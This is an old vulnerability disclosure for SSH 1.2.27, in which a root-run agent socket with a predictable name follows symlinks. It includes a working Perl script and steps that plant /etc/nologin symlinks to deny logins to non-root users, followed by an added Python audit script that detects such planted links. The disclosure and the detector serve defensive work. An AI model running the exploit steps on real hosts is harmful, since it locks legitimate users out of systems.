- SSH 1.2.27 DoS:
o SSH has the option of setting up "authentication sockets", used to
pass authentication keys securely. When this is used, a socket is
created on both client and server machines; the socket created on the
server uses an often easy-to-guess filename (based on the PID)...
The creation of this socket is done while the server is acting as
root and does follow symlinks.
exploit:
- connect to remote machine
- run the following script (creates symlinks for the next 50 PIDs):
#!/usr/bin/perl
$pid = $$;                      # our own PID; the server's agent socket name is derived from its PID
$whoami = `whoami`;
chop($whoami);
mkdir("/tmp/ssh-$whoami", 0700); # per-user agent socket directory sshd will use
for ($i = $pid; $i < $pid+50; $i++) {
    symlink("/etc/nologin", "/tmp/ssh-$whoami/ssh-$i-agent");
}
- on local machine, execute ssh-agent1; it will produce a few lines
to cut and paste into your shell. Do so.
- ssh1 to the remote machine; enter password
The socket will have been created at /etc/nologin, preventing other
non-root users from logging in. This connection too will die with
"Logins are currently denied by /etc/nologin:"
This was tested on a RedHat 6.0 machine, with standard
configure/make/install installation of ssh. This script should work
pretty well for systems that create processes where each PID is one
greater than the last; other platforms may require modifications, or
many, many more links, if they're exploitable.
I sent this info in to the ssh folks a while ago and they were looking
into it; haven't heard from them in over a week though.
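The pattern described above (a symlink planted under a predictable agent-socket name) can be audited from the defending side. The following is an added example, not part of the original post: it checks a per-user agent socket directory with lstat (so links are inspected, not followed) and reports any entry that is a symlink, not a socket, or not owned by the directory's owner. The sample directory it builds is constructed test data, not a real /tmp/ssh-<user> directory.

```python
import os
import socket
import stat
import tempfile


def audit_agent_dir(agent_dir):
    """Return [(entry_name, finding), ...] for a per-user agent socket directory.

    Every entry is expected to be a real UNIX socket owned by the directory's
    owner; a symlink in here is exactly what the advisory above abuses.
    """
    findings = []
    dir_st = os.lstat(agent_dir)
    if stat.S_ISLNK(dir_st.st_mode):
        return [(agent_dir, "directory path is itself a symlink")]
    if dir_st.st_mode & 0o077:
        findings.append((agent_dir, "directory is group/world accessible"))
    for name in sorted(os.listdir(agent_dir)):
        path = os.path.join(agent_dir, name)
        st = os.lstat(path)  # lstat: inspect the link itself, never its target
        if stat.S_ISLNK(st.st_mode):
            findings.append((name, "symlink -> " + os.readlink(path)))
        elif not stat.S_ISSOCK(st.st_mode):
            findings.append((name, "not a socket"))
        elif st.st_uid != dir_st.st_uid:
            findings.append((name, "owner differs from directory owner"))
    return findings


def build_sample_dir():
    """Constructed sample directory: one genuine agent socket, one planted symlink."""
    base = tempfile.mkdtemp(prefix="ssh-audit-")
    os.chmod(base, 0o700)
    sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    sock.bind(os.path.join(base, "ssh-1000-agent"))          # legitimate socket
    os.symlink("/etc/nologin", os.path.join(base, "ssh-1001-agent"))  # planted link
    return base, sock  # keep the socket object alive while the directory is audited


if __name__ == "__main__":
    sample_dir, keep = build_sample_dir()
    for entry, finding in audit_agent_dir(sample_dir):
        print(f"{sample_dir}/{entry}: {finding}")
    keep.close()
```

Run it against a real directory by calling audit_agent_dir("/tmp/ssh-<user>"); an empty list means every entry is a socket owned by the directory owner.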